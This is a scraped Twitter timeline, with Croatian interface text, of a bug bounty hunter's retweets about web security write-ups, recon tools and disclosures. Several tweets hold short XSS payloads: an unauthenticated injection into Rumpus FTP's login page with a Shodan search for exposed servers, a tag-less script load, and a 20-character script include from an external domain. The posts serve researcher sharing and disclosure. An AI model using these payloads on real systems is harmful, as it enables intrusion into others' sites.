Tweetovi
- Tweetovi, trenutna stranica.
- Tweetovi i odgovori
- Medijski sadržaj
Blokirali ste korisnika/cu @inhibitor181
Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @inhibitor181
-
Cosmin proslijedio/la je Tweet
@ngalongc,@EdOverflow, and I are starting a new security blog. In our first write-up, we will discuss the impact of "SameSite by default" and how it affects web app sec. Feel free to request future topics you would like us to cover. https://blog.reconless.com/samesite-by-default/ …pic.twitter.com/5R23YmpksT
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Cosmin proslijedio/la je Tweet
I'm looking for a new role doing something AppSec/Red Team/OSINT related in Seattle or remote. My strong suite is web and mobile security, with lots of bug bounty experience. My resume and contact info are on http://bonjarber.com , DMs open as well. RT's are much appreciated.
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Cosmin proslijedio/la je Tweet
Did you know that the address '<a@b.com>c@d.com' when given to SES will send an email to a@b.com? this could lead to interesting exploit scenarios with some email parsing libraries/code https://nathandavison.com/blog/exploiting-email-address-parsing-with-aws-ses …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Cosmin proslijedio/la je Tweet
GGvulnz — How I hacked hundreds of companies through Google Groups -- by
@0xmilan https://medium.com/@milanmagyar/ggvulnz-how-i-hacked-hundreds-of-companies-through-google-groups-b69c658c8924 …pic.twitter.com/eVA91hcjZv
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Cosmin proslijedio/la je Tweet
I have made a demo application to abuse Google Chrome cache by exploiting CORS. The code is big messy but it works. Original research was from
@BitK_ Reviews are appreciated :-) https://github.com/MayurUdiniya/Chrome-CORS …#bugbounty#infosecHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Cosmin proslijedio/la je TweetHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
Cosmin proslijedio/la je Tweet
Added: Response Grepperhttps://portswigger.net/bappstore/665178d3bf494019b3e8fe53a133528b …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Cosmin proslijedio/la je Tweet
Hi all, dropping another tool today. This one is very simple, it does reverse DNS lookups as fast as possible. It's a great way of discovering domains and subdomains owned by a company when you know their IP address range(s). Check it out: https://github.com/hakluke/hakrevdns …pic.twitter.com/WZV9FQw1jH
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Cosmin proslijedio/la je Tweet
One of the scarier bugs I’ve found: with Microsoft’s go-ahead & after many hours spent, I’m excited to finally publish this writeup and PoC!
https://www.allysonomalley.com/2020/01/06/saying-goodbye-to-my-favorite-5-minute-p1/ …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Cosmin proslijedio/la je Tweet
Australia is on fire right now! What if we all donate 1 or 2 dollars? Maybe we can help save hundreds of animals in danger. To all my friends doing bug bounty, what’s one dollar? 1% of a low risk bug? https://www.wires.org.au/donate/emergency-fund … if you can’t donate, plz RT! Thanks!!pic.twitter.com/hFow0ABNKX
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Cosmin proslijedio/la je Tweet
FINALLY releasing hakrawler! A web crawler for hackers! Check out the blog post for details. https://medium.com/@hakluke/introducing-hakrawler-a-fast-web-crawler-for-hackers-ff799955f134 …pic.twitter.com/XDx2ujPQpp
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Cosmin proslijedio/la je Tweet
Microsoft Edge (And Internet Explorer) is the only browser that allows running JavaScript from a <script> without the end tag <script async src=data:,alert(1)>
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Check out my 2019 Year In Review on
@Hacker0x01: https://hackerone.com/inhibitor181/year-in-review …!#TogetherWeHitHarderHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Cosmin proslijedio/la je Tweet
Writeup of an SOP bypass on
#Hackerone using a little trick learned from@BitK_ ! https://enumerated.wordpress.com/2019/12/24/sop-bypass-via-browser-cache/ …@Hacker0x01#TogetherWeHitHarder#bugbountyHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Cosmin proslijedio/la je Tweet
Nice set of regex for finding secrets!
https://raw.githubusercontent.com/xyele/secretx/master/patterns.json …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Cosmin proslijedio/la je Tweet
Rumpus FTP Web File Manager has an
#unauthenticated XSS at the login page. Just visit: http://example[.]com/Login?!'><svg/onload="XSS"> Anything after the character "!" will be inserted inside the HTML without encoding.#bugbounty Search on Shodan: https://beta.shodan.io/search?query=%22Server%3A+Rumpus%22 …Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Cosmin proslijedio/la je Tweet
Finally got the approval, Here are multiple Linode's access token stealing/account takeover bugs, I like the second one. Retweet if you like it.
#bugbountyhttps://medium.com/@rootxharsh_90844/abusing-feature-to-steal-your-tokens-f15f78cebf74 …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Cosmin proslijedio/la je Tweet
Just posted From checkra1n to Frida: iOS App Pentesting Quickstart on iOS 13 - to be followed up with a second writeup on bug I've found with these tools.https://spaceraccoon.dev/from-checkra1n-to-frida-ios-app-pentesting-quickstart-on-ios-13 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Cosmin proslijedio/la je Tweet
The CVE-2019-18935 is a severe insecure deserialization vulnerability affecting
#Telerik UI. Understand its impact + learn to safely patch your software in this post from@noperator: https://hubs.ly/H0mf7L-0 (With thanks to@mwulftange +@bao7uo)pic.twitter.com/qHc5XoKywA
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Cosmin proslijedio/la je Tweet
Exploiting XSS with 20 characters limitation Notice that ff characters is only one character but when browsers interpret it, it will be expanded as ff two characters. This open the door to buy larger domains, in a cheaper way. <script src=//℡㏛.pw> https://jlajara.gitlab.io/posts/2019/11/30/XSS_20_characters.html?fbclid=IwAR1P8FGG_3ph7R6SI6M6EIeFPo2TBh1eEGnEdR4h-gU8rb4ptx0lEDEM9Kw …pic.twitter.com/79ptmwH24S
Ovo je potencijalno osjetljiv multimedijski sadržaj. Saznajte više
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.
